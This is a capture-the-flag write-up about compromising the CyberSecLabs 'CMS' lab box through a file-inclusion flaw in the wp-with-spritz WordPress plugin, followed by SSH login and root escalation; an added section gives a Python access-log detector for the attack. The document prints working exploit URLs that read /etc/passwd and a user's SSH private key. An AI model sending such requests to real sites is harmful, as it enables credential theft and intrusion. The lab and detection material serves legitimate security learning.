CyberSecLabs-CMS

Software Sinner
3 min read · Jul 3, 2020


This is my fourth write-up, and I will be discussing my experience with the machine “CMS” from CyberSecLabs. CyberSecLabs is a great platform for people who are starting out with penetration testing. CMS was a fairly simple Linux box. A WordPress plugin, wp-with-spritz, was found to be vulnerable, leading to a Remote File Inclusion (RFI).

Step 1: Enumeration

I started off with an Nmap scan and jumped right in. My first scan used the default scripts (-sC) and version detection (-sV). A second scan gave me pretty much the same results.

sudo nmap -sC -sV 172.31.1.8

The WordPress version, 5.3.2, stuck out like a sore thumb to me. I ran WPScan against the IP and went down the list, trying each outdated plugin with known exploits until I reached wp-with-spritz.

sudo wpscan --url http://172.31.1.8/

Step 2: Exploitation

I googled the plugin wp-with-spritz along with the word exploit and discovered this sucker.

The exploit shows that a Remote File Inclusion (RFI) is possible, so I appended the exploit path to the URL and /etc/passwd puked out all the user info.

http://172.31.1.8/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

Now that we know this exploit works, I attempted throwing a reverse shell onto the system and had no luck. I can't stress how important it is to look around the main site's web pages for clues. I found a blog tab, and it ended up giving me info on where the user angel stores his SSH private key.

Really dude?

I appended the path to the Remote File Inclusion (RFI) and obtained the SSH private key.

http://172.31.1.8/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//home/angel/.ssh/id_rsa
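From the defender's side, the two requests above leave a very recognisable trail in the web server's access log. The following is an added example, not code from the original post or from the plugin: a small Python detector that parses Apache-style access-log lines, picks out requests to the wp-with-spritz filter endpoint, and flags any url= value that carries path traversal or a local filesystem path (a remote http(s) URL is the plugin's intended use and is not flagged). The log lines are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample Apache access-log lines (not taken from the original post).
SAMPLE_LOG = """\
172.31.1.50 - - [03/Jul/2020:10:12:01 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd HTTP/1.1" 200 1834
172.31.1.50 - - [03/Jul/2020:10:12:40 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=%2F..%2F..%2F..%2F..%2F%2Fhome%2Fangel%2F.ssh%2Fid_rsa HTTP/1.1" 200 1675
172.31.1.51 - - [03/Jul/2020:10:13:02 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=https://example.org/article HTTP/1.1" 200 5120
172.31.1.52 - - [03/Jul/2020:10:14:11 +0000] "GET /blog/ HTTP/1.1" 200 9876
"""

# Plugin endpoint and parameter used in the write-up above.
PLUGIN_PATH = "/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def spritz_url_param(target):
    """Return the decoded url= value if the request hits the spritz endpoint, else None."""
    parts = urlsplit(target)
    if parts.path != PLUGIN_PATH:
        return None
    # parse_qs decodes once; decode again so double-encoded traversal does not slip past.
    return unquote(parse_qs(parts.query).get("url", [""])[0])


def classify(url_param):
    """Return a reason string if the url= value looks like file inclusion, else None."""
    if "../" in url_param or "..\\" in url_param:
        return "path traversal in url="
    if url_param.startswith("/") or url_param.lower().startswith("file:"):
        return "local filesystem path in url="
    return None  # a remote http(s) URL is what the plugin is meant to fetch


def scan(log_text):
    """Return one (ip, timestamp, status, reason, url_param) tuple per suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url_param = spritz_url_param(m["target"])
        reason = classify(url_param) if url_param is not None else None
        if reason:
            hits.append((m["ip"], m["ts"], int(m["status"]), reason, url_param))
    return hits
```

A 200 status on a flagged request means the file was most likely served, so those hits deserve priority when triaging.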

I took the key, copied it into a text file, and attempted to convert it with ssh2john, which detected that it was not password protected. I then connected to the host directly.

sudo chmod 600 angelkey.txt
sudo ssh -i angelkey.txt angel@172.31.1.8

Step 3: Post Exploitation

The first thing I do when I get access to a box, aside from grabbing the user flag, is run a couple of commands to see if privileges can be escalated:

sudo -l
sudo -i

We see that all commands can be run with no restrictions, so I escalated to root easily.

Owned…
